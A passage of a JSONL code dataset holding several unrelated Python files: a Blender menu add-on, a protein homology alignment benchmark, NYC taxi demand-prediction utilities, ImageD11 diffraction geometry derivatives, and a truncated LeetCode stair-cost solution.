AddMenu()\r\n        self.report({'INFO'}, \"Menu added\")\r\n        return {\"FINISHED\"}\r\n    \r\nclass panel(bpy.types.Panel):\r\n    bl_label = \"Menu\"\r\n    bl_space_type = \"VIEW_3D\"\r\n    bl_region_type = 'UI'\r\n    \r\n    def draw(self,context):\r\n        layout = self.layout\r\n        scene = context.scene\r\n        \r\n        row = layout.row()\r\n        row.scale_y = 1.6\r\n        row.operator(\"object.add_menu\",text='Add Menu')\r\n    \r\ndef register():\r\n    bpy.utils.register_class(panel)\r\n    bpy.utils.register_class(add_menu)\r\n\r\ndef 
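# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# The logic-brick wiring above repeats one shape per button: a tap left-click
# sensor plus a mouse-over sensor, an AND controller, and one actuator, all
# linked together. A hypothetical helper (Blender 2.7x BGE only, using the
# same bpy.ops.logic API as the record) that collapses each block:
import bpy  # only available inside Blender

def wire_click_button(obj, actuator_type, actuator_name):
    bpy.ops.logic.sensor_add(type="MOUSE", name="left", object=obj.name)
    obj.game.sensors["left"].use_tap = True
    bpy.ops.logic.sensor_add(type="MOUSE", name="over", object=obj.name)
    obj.game.sensors["over"].mouse_event = "MOUSEOVER"
    bpy.ops.logic.controller_add(type="LOGIC_AND", object=obj.name)
    bpy.ops.logic.actuator_add(type=actuator_type, name=actuator_name,
                               object=obj.name)
    ctrl = obj.game.controllers[-1]
    obj.game.sensors["left"].link(ctrl)
    obj.game.sensors["over"].link(ctrl)
    obj.game.actuators[actuator_name].link(ctrl)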
unregister():\r\n bpy.utils.unregister_class(panel)\r\n bpy.utils.unregister_class(add_menu)\r\n \r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"Shihab3/addMenuAddon","sub_path":"menuAddon.py","file_name":"menuAddon.py","file_ext":"py","file_size_in_byte":9038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70117883370","text":"from copy import deepcopy\nimport subprocess\nfrom sys import argv\nimport random\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport time\n\nNprots=1000\nmats=[\"randblos.mat\",\"blosum62.mat\",\"new99.mat\"]\n\nf=open(\"astral-scopedom-seqres-gd-sel-gs-bib-40-2.06.fa\")\nprots=[]\nseq=\"\"\ncurrprot=[\"\",\"\"]\n\nfor line in f:\n if line[0]==\">\":\n if seq==\"\":\n scopid=line.split()[1]\n parts=scopid.split(\".\")\n currprot[0]=\".\".join(parts[:3])\n else:\n currprot[1]=seq\n prots.append(deepcopy(currprot))\n seq=\"\"\n scopid=line.split()[1]\n parts=scopid.split(\".\")\n currprot[0]=\".\".join(parts[:3])\n else:\n seq+=line.strip().upper()\n\ncurrprot[1]=seq\nprots.append(currprot)\n\n#Nprots=len(prots)\ncurrmat=\"Default\"\n\ndef align(i):\n conttab=[[0,0],[0,0]]\n for j in range(i):\n if i!=j:\n if len(prots[i][1])>len(prots[j][1]):\n seq1=prots[i][1]\n seq2=prots[j][1]\n else:\n seq1=prots[j][1]\n seq2=prots[i][1]\n seq1=prots[i][1]\n seq2=prots[j][1]\n process=subprocess.Popen([\"./align\",\"-p\",seq1,\"-q\",seq2,\"-m\",currmat,\"-Q\"],stdout=subprocess.PIPE)\n seqid,err=process.communicate()\n seqid=float(seqid)\n if seqid>0.25:\n if prots[i][0]==prots[j][0]:\n conttab[0][0]+=1\n else:\n conttab[0][1]+=1\n else:\n if prots[i][0]==prots[j][0]:\n conttab[1][0]+=1\n else:\n conttab[1][1]+=1\n return conttab\n\nif len(argv) > 1:\n random.seed(argv[1])\nrandom.shuffle(prots)\n\nfor mat in mats:\n print (time.strftime(\"%m/%d/%Y %H:%M:%S\"))\n currmat=mat\n pool=ThreadPool(8)\n eyes=[i for i in range(Nprots)]\n res=pool.map(align,eyes)\n pool.close()\n pool.join()\n conttab=[[0,0],[0,0]]\n for i in res:\n conttab[0][0]+=i[0][0]\n conttab[0][1]+=i[0][1]\n conttab[1][0]+=i[1][0]\n conttab[1][1]+=i[1][1]\n print(conttab)\n sumall=float(sum([conttab[0][0],conttab[0][1],conttab[1][0],conttab[1][1]]))\n print(sum([conttab[0][0],conttab[1][1]])/sumall)\n print(float(conttab[0][0])/sum([conttab[0][0],conttab[0][1]]))\n print(float(conttab[0][0])/sum([conttab[0][0],conttab[1][0]]))\n \nprint (time.strftime(\"%m/%d/%Y %H:%M:%S\"))\n","repo_name":"ewbell94/bioinf527proj","sub_path":"homologsearch.py","file_name":"homologsearch.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2259507232","text":"import dask.dataframe as dd\r\nimport math\r\nimport datetime\r\nimport time\r\nimport numpy as np\r\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\r\n\r\ndef data_loading(months, path, initial_frames):\r\n for month in months:\r\n initial_frames[f'{month}'] = dd.read_csv(path + \"\\\\\" + f'yellow_tripdata_{month}.csv')\r\n\r\ndef convert_to_unix(s):\r\n return time.mktime(datetime.datetime.strptime(s, \"%Y-%m-%d %H:%M:%S\").timetuple())\r\n\r\n# Return a DataFrame with additional trip time-related columns\r\ndef return_with_trip_times(frame):\r\n duration = frame[['tpep_pickup_datetime','tpep_dropoff_datetime']].compute()\r\n #pickups and dropoffs to unix time\r\n duration_pickup = [convert_to_unix(x) for x in duration['tpep_pickup_datetime'].values]\r\n duration_drop = 
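# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# The three prints at the end of homologsearch.py above are accuracy,
# precision and recall over a 2x2 table whose rows are "seqid > 0.25 or not"
# and whose columns are "same SCOP fold or not". Spelled out with labels
# (the counts here are made up):
conttab = [[40, 10],   # predicted homolog:     true pos, false pos
           [15, 935]]  # predicted non-homolog: false neg, true neg
tp, fp = conttab[0]
fn, tn = conttab[1]
total = tp + fp + fn + tn
print("accuracy :", (tp + tn) / total)   # 0.975
print("precision:", tp / (tp + fp))      # 0.8
print("recall   :", tp / (tp + fn))      # ~0.727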
[convert_to_unix(x) for x in duration['tpep_dropoff_datetime'].values]\r\n #calculate duration of trips\r\n durations = (np.array(duration_drop) - np.array(duration_pickup))/float(60)\r\n\r\n #append durations of trips and speed in miles/hr to a new dataframe\r\n new_frame = frame[['passenger_count','trip_distance','pickup_longitude','pickup_latitude','dropoff_longitude','dropoff_latitude','total_amount']].compute()\r\n \r\n new_frame['trip_times'] = durations\r\n new_frame['pickup_times'] = duration_pickup\r\n new_frame['Speed'] = 60*(new_frame['trip_distance']/new_frame['trip_times'])\r\n \r\n return new_frame\r\n\r\n\r\n#return a dataframe with outliers removed\r\ndef remove_outliers(new_frame):\r\n speed_limit = 45.31\r\n # Applying all filters\r\n new_frame = new_frame[\r\n ((new_frame.dropoff_longitude.between(-74.15, -73.7004)) &\r\n (new_frame.dropoff_latitude.between(40.5774, 40.9176))) &\r\n ((new_frame.pickup_longitude.between(-74.15, -73.7004)) &\r\n (new_frame.pickup_latitude.between(40.5774, 40.9176)))\r\n ]\r\n new_frame = new_frame[(new_frame.trip_times > 0) & (new_frame.trip_times < 720)]\r\n new_frame = new_frame[(new_frame.trip_distance > 0) & (new_frame.trip_distance < 23)]\r\n new_frame = new_frame[(new_frame.Speed < speed_limit) & (new_frame.Speed > 0)]\r\n new_frame = new_frame[(new_frame.total_amount < 1000) & (new_frame.total_amount > 0)]\r\n\r\n return new_frame\r\n\r\n# Constants for Unix times\r\nUNIX_TIMES_2015 = [1420070400, 1422748800, 1425168000, 1427846400, 1430438400, 1433116800]\r\nUNIX_TIMES_2016 = [1451606400, 1454284800, 1456790400, 1459468800, 1462060800, 1464739200]\r\n\r\ndef convert_to_est(unix_time, start_unix_time):\r\n # Convert Unix time to EST\r\n return int((unix_time - start_unix_time) / 600) + 33\r\n\r\ndef add_pickup_bins(frame, month, year):\r\n unix_pickup_times = frame['pickup_times'].values\r\n unix_times = [UNIX_TIMES_2015, UNIX_TIMES_2016]\r\n \r\n start_pickup_unix = unix_times[year - 2015][month - 1]\r\n \r\n # Convert pickup times to 10-minute bins in EST\r\n ten_minute_bins = [convert_to_est(unix_time, start_pickup_unix) for unix_time in unix_pickup_times]\r\n \r\n frame['pickup_bins'] = np.array(ten_minute_bins)\r\n \r\n return frame\r\n\r\n\r\n# Data Preparation for the months of Jan,Feb and March 2016\r\ndef frame_preparation(months, initial_frames, kmeans, prepared_frames, groupby_frames):\r\n for month in months:\r\n if 'jan' in month:\r\n mnth = 1\r\n elif 'feb' in month:\r\n mnth = 2\r\n else:\r\n mnth = 3\r\n if '2015' in month:\r\n year = 2015\r\n else:\r\n year = 2016\r\n prepared_frames[f'{month}'], groupby_frames[f'{month}'] = datapreparation(initial_frames[f'{month}'],kmeans,mnth,year)\r\n \r\ndef datapreparation(frame,kmeans,month_no,year_no):\r\n \r\n print (\"Return with trip times..\")\r\n\r\n frame_with_durations = return_with_trip_times(frame)\r\n \r\n print (\"Remove outliers..\")\r\n frame_with_durations_outliers_removed = remove_outliers(frame_with_durations)\r\n\r\n \r\n print (\"Estimating clusters..\")\r\n frame_with_durations_outliers_removed['pickup_cluster'] = kmeans.predict(frame_with_durations_outliers_removed[['pickup_latitude', 'pickup_longitude']])\r\n #frame_with_durations_outliers_removed_2016['pickup_cluster'] = kmeans.predict(frame_with_durations_outliers_removed_2016[['pickup_latitude', 'pickup_longitude']])\r\n\r\n print (\"Final groupbying..\")\r\n final_updated_frame = add_pickup_bins(frame_with_durations_outliers_removed,month_no,year_no)\r\n final_groupby_frame = 
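# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# convert_to_unix above parses trip timestamps with strptime and converts
# them to epoch seconds via mktime, so results are in the local timezone of
# the machine running it -- worth keeping in mind when binning by hour.
import time
import datetime

def convert_to_unix(s):
    return time.mktime(datetime.datetime.strptime(s, "%Y-%m-%d %H:%M:%S").timetuple())

pickup = convert_to_unix("2016-01-01 00:10:00")
dropoff = convert_to_unix("2016-01-01 00:25:30")
print("trip minutes:", (dropoff - pickup) / 60.0)  # -> 15.5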
final_updated_frame[['pickup_cluster','pickup_bins','trip_distance']].groupby(['pickup_cluster','pickup_bins']).count()\r\n \r\n return final_updated_frame,final_groupby_frame\r\n\r\n###########################################\r\ndef unique_pickup_bins(months):\r\n for month in months:\r\n globals()[f'{month}_unique'] = return_unq_pickup_bins(globals()[f'{month}_frame'])\r\n\r\n# Gets the unique bins where pickup values are present for each each reigion\r\ndef return_unq_pickup_bins(frame):\r\n values = []\r\n for i in range(0,40):\r\n new = frame[frame['pickup_cluster'] == i]\r\n list_unq = list(set(new['pickup_bins']))\r\n list_unq.sort()\r\n values.append(list_unq)\r\n return values\r\n\r\n#####################################################################################\r\ndef fill_missing(count_values,values):\r\n smoothed_regions=[]\r\n ind=0\r\n for r in range(0,40):\r\n smoothed_bins=[]\r\n for i in range(4464):\r\n if i in values[r]:\r\n smoothed_bins.append(count_values[ind])\r\n ind+=1\r\n else:\r\n smoothed_bins.append(0)\r\n smoothed_regions.extend(smoothed_bins)\r\n return smoothed_regions\r\n\r\n\r\ndef smoothing(count_values,values):\r\n smoothed_regions=[] # stores list of final smoothed values of each reigion\r\n ind=0\r\n repeat=0 \r\n smoothed_value=0\r\n for r in range(0,40):\r\n smoothed_bins=[] #stores the final smoothed values\r\n repeat=0\r\n for i in range(4464):\r\n if repeat!=0: # prevents iteration for a value which is already visited/resolved\r\n repeat-=1\r\n continue\r\n if i in values[r]: #checks if the pickup-bin exists \r\n smoothed_bins.append(count_values[ind]) # appends the value of the pickup bin if it exists\r\n else:\r\n if i!=0:\r\n right_hand_limit=0\r\n for j in range(i,4464):\r\n if j not in values[r]: #searches for the left-limit or the pickup-bin value which has a pickup value\r\n continue\r\n else:\r\n right_hand_limit=j\r\n break\r\n if right_hand_limit==0:\r\n #Case 1: When we have the last/last few values are found to be missing,hence we have no right-limit here\r\n smoothed_value=count_values[ind-1]*1.0/((4463-i)+2)*1.0 \r\n for j in range(i,4464): \r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n smoothed_bins[i-1] = math.ceil(smoothed_value)\r\n repeat=(4463-i)\r\n ind-=1\r\n else:\r\n #Case 2: When we have the missing values between two known values\r\n smoothed_value=(count_values[ind-1]+count_values[ind])*1.0/((right_hand_limit-i)+2)*1.0 \r\n for j in range(i,right_hand_limit+1):\r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n smoothed_bins[i-1] = math.ceil(smoothed_value)\r\n repeat=(right_hand_limit-i)\r\n else:\r\n #Case 3: When we have the first/first few values are found to be missing,hence we have no left-limit here\r\n right_hand_limit=0\r\n for j in range(i,4464):\r\n if j not in values[r]:\r\n continue\r\n else:\r\n right_hand_limit=j\r\n break\r\n smoothed_value=count_values[ind]*1.0/((right_hand_limit-i)+1)*1.0\r\n for j in range(i,right_hand_limit+1):\r\n smoothed_bins.append(math.ceil(smoothed_value))\r\n repeat=(right_hand_limit-i)\r\n ind+=1\r\n smoothed_regions.extend(smoothed_bins)\r\n return smoothed_regions\r\n\r\n###############################################################################################\r\n\r\ndef initialize_kmeans(frame):\r\n print(\"initializing kmeans\")\r\n frame = return_with_trip_times(frame)\r\n frame = remove_outliers(frame)\r\n coords = frame[['pickup_latitude', 'pickup_longitude']].values\r\n kmeans = MiniBatchKMeans(n_clusters=40, 
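# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# smoothing() above spreads the pickup counts flanking a missing run of bins
# evenly over the run (ceil-rounded), unlike fill_missing(), which writes
# zeros. The core "missing bins between two known values" case in isolation:
import math

def smooth_gap(left_count, right_count, gap_len):
    # the two endpoint counts are shared across endpoints + gap bins
    share = (left_count + right_count) / (gap_len + 2)
    return [math.ceil(share)] * (gap_len + 2)

print(smooth_gap(10, 14, 2))  # -> [6, 6, 6, 6]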
batch_size=10000,random_state=0).fit(coords)\r\n return kmeans\r\n###################################\r\n\r\ndef split_data(tsne_feature):\r\n total_timestamps = 13099\r\n train_size = int(total_timestamps * 0.7)\r\n test_size = int(total_timestamps * 0.3)\r\n\r\n print(\"Size of train data:\", train_size)\r\n print(\"Size of test data:\", test_size)\r\n\r\n # Extracting first 70% of timestamp values for training data\r\n train_features = [tsne_feature[i * total_timestamps : (total_timestamps*i + train_size)] for i in range(40)]\r\n\r\n # Extracting remaining 30% of timestamp values for testing data\r\n test_features = [tsne_feature[i * total_timestamps + train_size : (i + 1) * total_timestamps] for i in range(40)]\r\n return train_features, test_features\r\n#########################################\r\n\r\ndef frame_smoothing(months, smoothed_frames):\r\n for month in months:\r\n if month == 'jan_2015':\r\n globals()[f'{month}_fill'] = fill_missing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n smoothed_frames[f'{month}'] = smoothing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n else:\r\n smoothed_frames[f'{month}'] = fill_missing(globals()[f'{month}_groupby']['trip_distance'].values.compute(), globals()[f'{month}_unique'])\r\n","repo_name":"tarangchaturvedi/taxi_demand_prediction","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2521954398","text":"\nimport ImageD11.transform\nimport numpy as np\n\ndetpnames = [ 'distance', \n 'y_center', 'z_center',\n 'tilt_x', 'tilt_y', 'tilt_z',\n 'y_size', 'z_size', \n 'o11','o12','o21','o22'\n ]\ndetpsteps = {\n 'distance' : lambda distance: 0.001 * distance,\n 'y_center' : lambda centre: 0.01,\n 'z_center' : lambda centre: 0.01,\n 'tilt_x' : lambda tilt: 0.01*np.pi/180.0,\n 'tilt_y' : lambda tilt: 0.01*np.pi/180.0,\n 'tilt_z' : lambda tilt: 0.01*np.pi/180.0,\n 'y_size' : lambda size: 1.001*size,\n 'z_size' : lambda size: 1.001*size \n }\n\ndef computeXLYLZL( colfile, pars):\n pks = [ colfile.sc, colfile.fc ]\n dargs = {}\n for p in detpnames:\n dargs[p] = pars.get(p)\n xlylzl = ImageD11.transform.compute_xyz_lab( pks, **dargs )\n return xlylzl\n\ndef derivativeXLYLZL( colfile, pars, refinables ):\n pks = [ colfile.sc, colfile.fc ]\n dargs = {}\n for p in detpnames:\n dargs[p] = pars.get(p)\n calc = computeXLYLZL( colfile, pars )\n # parameter step sizes\n derivs = {}\n for p in refinables:\n step = detpsteps[p](dargs[p])\n psave = dargs[p]\n dargs[p] += step\n xlylzl1 = ImageD11.transform.compute_xyz_lab( pks, **dargs )\n derivs[p] = (xlylzl1 - calc) / step\n dargs[p] = psave\n return calc, derivs\n\n\noripnames = [ 'wedge', 'chi' ] \noripsteps = {'wedge' : lambda wedge : 0.1,\n 'chi' : lambda chi : 0.1,\n 't_x' : lambda t : 0.1, \n 't_y' : lambda t : 0.1, \n 't_z' : lambda t : 0.1, \n }\n\ndef grainorigins( colfile, agrain, pars ):\n omega = colfile.omega\n dargs = { 'wedge' : pars.get('wedge'),\n 'chi' : pars.get('chi') }\n dargs['t_x'], dargs['t_y'], dargs['t_z'] = \\\n agrain.translation\n origins = ImageD11.transform.compute_grain_origins( \n omega, **dargs )\n return origins\n\ndef derivativeorigins(colfile, agrain, pars, refinables):\n origins0 = grainorigins( colfile, agrain, pars )\n omega = colfile.omega\n t_x, t_y, t_z = agrain.translation\n wedge = pars.get('wedge')\n chi = 
pars.get('chi')\n    derivs = {}\n    dargs = { 'wedge' : pars.get('wedge'),\n              'chi' : pars.get('chi') }\n    dargs['t_x'], dargs['t_y'], dargs['t_z'] = \\\n                                       agrain.translation\n    for p in refinables:\n        step = oripsteps[p](dargs[p])\n        psave = dargs[p]\n        dargs[p] += step\n        origins1 = ImageD11.transform.compute_grain_origins( omega, \n                                                             **dargs )\n        derivs[p] = (origins1 - origins0) / step\n        dargs[p] = psave\n    return origins0, derivs\n\ndef labvec( colfile, agrain, pars):\n    v_xlylzl = computeXLYLZL( colfile, pars )\n    v_xgygzg = grainorigins( colfile, agrain, pars )\n    v_labvec = v_xlylzl - v_xgygzg\n    return v_labvec\n\ndef derivativelabvec( colfile, agrain, pars, refinables):\n    # use lists, not filter objects: both are iterated twice below\n    dxlp = [p for p in refinables if p in detpsteps]\n    xlylzl, Dxlylzl = derivativeXLYLZL( colfile, pars, dxlp )\n    dxgp = [p for p in refinables if p in oripsteps]\n    xgygzg, Dxgygzg = derivativeorigins( colfile, agrain, pars, dxgp)\n    labvec = xlylzl - xgygzg\n    Dlabvec = {}\n    for p in dxlp:\n        Dlabvec[p] = Dxlylzl[p]\n    for p in dxgp:\n        if p in Dlabvec: # not normally, but for forms sake\n            Dlabvec[p] -= Dxgygzg[p]\n        else:\n            Dlabvec[p] = -Dxgygzg[p]\n    return labvec, Dlabvec\n\ndef DgDk( colfile, pars):\n    omega = colfile.omega\n    # this applies a rotation matrix which depends on omega, wedge, chi\n    wedge = pars.get('wedge')\n    chi = pars.get('chi')\n    dummy = np.zeros( (3, len(omega) ) )\n    dummy[0,:]=1\n    dgdk0 = ImageD11.transform.compute_g_from_k(dummy,\n                      omega, wedge=wedge, chi=chi )\n    dummy[0,:]=0\n    dummy[1,:]=1\n    dgdk1 = ImageD11.transform.compute_g_from_k(dummy,\n                      omega, wedge=wedge, chi=chi )\n    dummy[1,:]=0\n    dummy[2,:]=1\n    dgdk2 = ImageD11.transform.compute_g_from_k(dummy,\n                      omega, wedge=wedge, chi=chi )\n    return dgdk0,dgdk1,dgdk2\n\n\ndef g_from_k( kvecs, colfile, pars ):\n    d0,d1,d2 = DgDk( colfile, pars ) \n    g = kvecs[0,:]*d0 + kvecs[1,:]*d1 + kvecs[2,:]*d2\n    return g\n\ndef derivative_g_from_k( kvecs, Dkvecs, colfile, pars, refinables ):\n    omega = colfile.omega\n    # this applies a rotation matrix which depends on omega, wedge, chi\n    wedge = pars.get('wedge')\n    chi = pars.get('chi')\n    dummy = np.zeros( (3, len(omega) ) )\n    dummy[0,:]=1\n    dgdk0 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi )\n    dummy[0,:]=0\n    dummy[1,:]=1\n    dgdk1 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi )\n    dummy[1,:]=0\n    dummy[2,:]=1\n    dgdk2 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi )\n    g = kvecs[0,:]*dgdk0 + kvecs[1,:]*dgdk1 + kvecs[2,:]*dgdk2\n    Dg = {}\n    if 'wedge' in refinables:\n        dummy[2,:]=0\n        dummy[0,:]=1\n        sw= oripsteps['wedge'](wedge)\n        mat00 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge+sw, chi=chi )\n        dummy[0,:]=0\n        dummy[1,:]=1\n        mat10 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge+sw, chi=chi )\n        dummy[1,:]=0\n        dummy[2,:]=1\n        mat20 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge+sw, chi=chi )\n        dmat0dw = (mat00 - dgdk0)/sw\n        dmat1dw = (mat10 - dgdk1)/sw\n        dmat2dw = (mat20 - dgdk2)/sw\n    if 'chi' in refinables:\n        dummy[2,:]=0\n        dummy[0,:]=1\n        sc = oripsteps['chi'](chi)\n        mat01 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi+sc )\n        dummy[0,:]=0\n        dummy[1,:]=1\n        mat11 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi+sc )\n        dummy[1,:]=0\n        dummy[2,:]=1\n        mat21 = ImageD11.transform.compute_g_from_k(dummy,\n                   omega, wedge=wedge, chi=chi+sc )\n        dmat0dc = (mat01 - dgdk0)/sc\n        dmat1dc = (mat11 - dgdk1)/sc\n        dmat2dc = (mat21 - dgdk2)/sc\n    
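# assemble dg/dp: rotate each dk/dp into g-space via the dgdk matrices, then add the wedge/chi matrix-derivative terms computed above\n    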
for p in refinables:\n        dk = Dkvecs[p]\n        # g = sum_i dgdki.ki\n        # dgdp = sum_i dgdki/dp.ki + dgdki.dkidp\n        # print p, k.shape\n        Dg[p] = dk[0,:]*dgdk0 + dk[1,:]*dgdk1 + dk[2,:]*dgdk2\n        if p == 'wedge':\n            # add on dmat contribution\n            Dg[p] += kvecs[0,:]*dmat0dw + kvecs[1,:]*dmat1dw + \\\n                     kvecs[2,:]*dmat2dw\n        if p == 'chi':\n            # add on dmat contribution\n            Dg[p] += kvecs[0,:]*dmat0dc + kvecs[1,:]*dmat1dc + \\\n                     kvecs[2,:]*dmat2dc\n    return g, Dg\n\n\ndef rotv3n( mat, Dmat, v3n, Dv3n ):\n    \"\"\"\n    Rotate vector by mat\n    \"\"\"\n    rv = np.dot( mat, v3n )\n#    print rv.shape, mat.shape, v3n.shape\n#    assert (rv[:,0] == np.dot(mat, v3n[:,0])).all()\n    Drv = {}\n    for p in Dv3n:\n        Drv[p] = np.dot( mat, Dv3n[p] )\n    for p in Dmat:\n        assert p not in Drv\n        Drv[p] = np.dot( Dmat[p], v3n )\n    return rv, Drv\n\ndef modv3n( vec3n ):\n    v2 = vec3n*vec3n\n    assert v2.shape[0] == 3\n    modv = np.sqrt(v2.sum(axis=0)) \n    return modv\n\n\ndef Derivativemodv3n( vec3n, Dvec3n ):\n    v2 = vec3n*vec3n\n    assert v2.shape[0] == 3\n    modv = np.sqrt(v2.sum(axis=0)) \n    # Now for derivatives.\n    # We have vec3n and d(vec3n)/dp\n    # We want modv and d(modv)/dp\n    # d(modv) = sqrt( x*x+y*y+z*z )\n    # d(modv)/dp = (dmodv/dx).(dx/dp) + (dmodv/dy).(dy/dp) + (dmodv/dz).(dz/dp)\n    dmodvdx = vec3n / modv\n    Dmodv3n={}\n    for p in Dvec3n: # each parameter in turn\n        Dmodv3n[p] = (dmodvdx*Dvec3n[p]).sum(axis=0)\n    return modv, Dmodv3n\n\n\ndef quotient_v3n_v1n( vlabvec, vmodv3n ):\n    quotient = vlabvec / vmodv3n \n    return quotient\n\ndef Derivative_quotient_v3n_v1n( labvec, Dlabvec, vmodv3n, Dmodv3n):\n    quotient = labvec / vmodv3n \n    Dquotient = {}\n    for p in Dlabvec.keys():\n        Dquotient[p] = Dlabvec[p] / vmodv3n\n    for p in Dmodv3n.keys():\n        if p in Dquotient: \n            Dquotient[p] -= Dmodv3n[p] * labvec / vmodv3n / vmodv3n\n        else:\n            Dquotient[p] = -Dmodv3n[p] * labvec / vmodv3n / vmodv3n\n    return quotient, Dquotient\n\n\ndef Derivativegobs( cf, gr, pars, refinables):\n    # Diffracted ray vector, depends on pars\n    # labvec is an orthogonal basis (real laboratory coordinates)\n    labvec, Dlabvec = derivativelabvec( cf, gr, pars,\n                                        refinables )\n    # Length of this vector\n    valmodv3n, Dmodv3n = Derivativemodv3n( labvec, Dlabvec )\n    # direction is along here: (eg, direction cosines, normalised vector)\n    direction, Ddirection = Derivative_quotient_v3n_v1n( \n        labvec, Dlabvec, valmodv3n, Dmodv3n)\n    wavelength = pars.get('wavelength')\n    k = direction / wavelength\n    k[0,:] = k[0,:] - 1.0/wavelength # incident beam along x\n    Dk = {}\n    for p in Ddirection:\n        Dk[p] = Ddirection[p]/wavelength\n    # Now we would like to fit this in terms of the grain ubi matrix and hkl\n    # indices\n    # g = transform.compute_g_from_k( k , colfile.omega, pars.get(\"wedge\"), pars.get(\"chi\") )\n    # Find hkl indices and which peaks are used\n    #hklr = np.dot( grains[0].ubi, g )\n    #hkli = np.floor(hklr+0.5)\n    #drlv = (hklr - hkli)\n    #drlv2 = np.sqrt((drlv*drlv).sum(axis=0))\n    # Rotate k to g, still an orthogonal reciprocal angstrom based metric\n    gobs, Dg = derivative_g_from_k( k , Dk, cf, pars, refinables )\n    return gobs, Dg\n\ndef gobs( cf, gr, pars):\n    # labvec is an orthogonal basis (real laboratory coordinates)\n    v_labvec = labvec( cf, gr, pars )\n    valmodv3n = modv3n( v_labvec )\n    # direction is along here: (eg, direction cosines, normalised vector)\n    direction = quotient_v3n_v1n( v_labvec , valmodv3n )\n    wavelength = pars.get('wavelength')\n    k = direction / wavelength\n    k[0,:] = k[0,:] - 1.0/wavelength # incident beam along x\n    gobs = g_from_k( k , cf, pars )\n    return gobs\n\ndef 
derivativegcalc(gr, gobs):\n # find hkl indices of spots\n # FIXME : these ought to be fixed from the colfile\n # gradients are in Dg\n hkli = np.floor( np.dot( gr.ubi, gobs ) + 0.5 )\n ub = np.linalg.inv( gr.ubi )\n gr.ub = ub\n gcalc = np.dot( ub, hkli )\n # Derivatives of gcalc w.r.t UB\n Dgcalc = {}\n for i in range(3):\n for j in range(3):\n t = np.zeros((3,3))\n t[i,j] = 1\n name = 'ub%d%d'%(i,j)\n Dgcalc[name] = t\n gcalc, dGcalc = rotv3n( ub, Dgcalc, hkli, {} )\n return gcalc, dGcalc\n \n\n\nclass tmpcol:\n def __init__(self, cf):\n self.sc = cf.sc.copy()\n self.fc = cf.fc.copy()\n self.omega = cf.omega.copy()\n\ndef dGdobs( cf, gr, pars, step=0.01) :\n tmp = tmpcol( cf )\n\n g0 = gobs( tmp, gr, pars )\n np.add(tmp.sc, step, tmp.sc )\n g1 = gobs( tmp, gr, pars )\n dgdsc = ( g1 - g0 ) / step # 3,N\n np.subtract(tmp.sc,step,tmp.sc)\n\n np.add(tmp.fc, step, tmp.fc )\n g1 = gobs( tmp, gr, pars )\n dgdfc = ( g1 - g0 ) / step\n np.subtract(tmp.fc,step,tmp.fc) # 3,N\n\n np.add(tmp.omega, step, tmp.omega )\n g1 = gobs( tmp, gr, pars )\n dgdomega = ( g1 - g0 ) / step # 3,N\n \n return dgdsc, dgdfc, dgdomega\n\n\ndef rotate_errors( cf , gr, pars):\n\n # single data point, uncorrelated has a matrix of:\n # 1/ss 0 0\n # 0 1/ff 0\n # 0 0 1/oo\n #\n # correlated that would be:\n # 1/ss 1/sf 1/so\n # 1/fs 1/ff 1/fo\n # 1/os 1/of 1/oo\n weights = np.zeros( (3,3,cf.nrows ), np.float)\n weights[0,0] = 1./cf.sigs/cf.sigs\n weights[1,1] = 1./cf.sigf/cf.sigf\n weights[2,2] = 1./cf.sigo/cf.sigo\n weights[1,0] = weights[0,1]= cf.covsf/cf.sigs/cf.sigf\n weights[2,0] = weights[0,2]= cf.covso/cf.sigs/cf.sigo\n weights[2,1] = weights[1,2]= cf.covfo/cf.sigo/cf.sigf\n #\n #\n return weights\n\n\n\nimport wripaca\nfrom ImageD11 import gv_general\n\ndef omegacalc_ub( ubi, h, pars, romega):\n pre = np.eye(3).ravel()\n posti = np.dot(gv_general.wedgemat(pars.get('wedge')), \n gv_general.chimat(pars.get('chi'))).T.ravel()\n axis = np.array([0,0,-1],np.float)\n ub = np.linalg.inv(ubi)\n gcalc = np.dot( ub, h.T ).T.copy()\n romegacalc = np.zeros( romega.shape, np.float)\n romegaerr = np.zeros( romega.shape, np.float)\n wripaca.omegacalcclose(gcalc,\n pre,\n posti,\n axis,\n romega,\n romegacalc,\n romegaerr,\n pars.get('wavelength'),\n )\n return romegacalc\n\n\n\n\n\n\n\n","repo_name":"jonwright/wripaca","sub_path":"cython/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":12884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20428913177","text":"class Solution:\n def minCostClimbingStairs(self, cost: List[int]) -> int:\n\n n = len(cost)\n costVal = [i for i in range(n)]\n \n if n == 1:\n costVal[0] = cost[0]\n return cost[0]\n if n == 2:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n return min(costVal)\n if n == 3:\n costVal[0] = cost[0]\n costVal[1] = cost[1]\n costVal[2] = 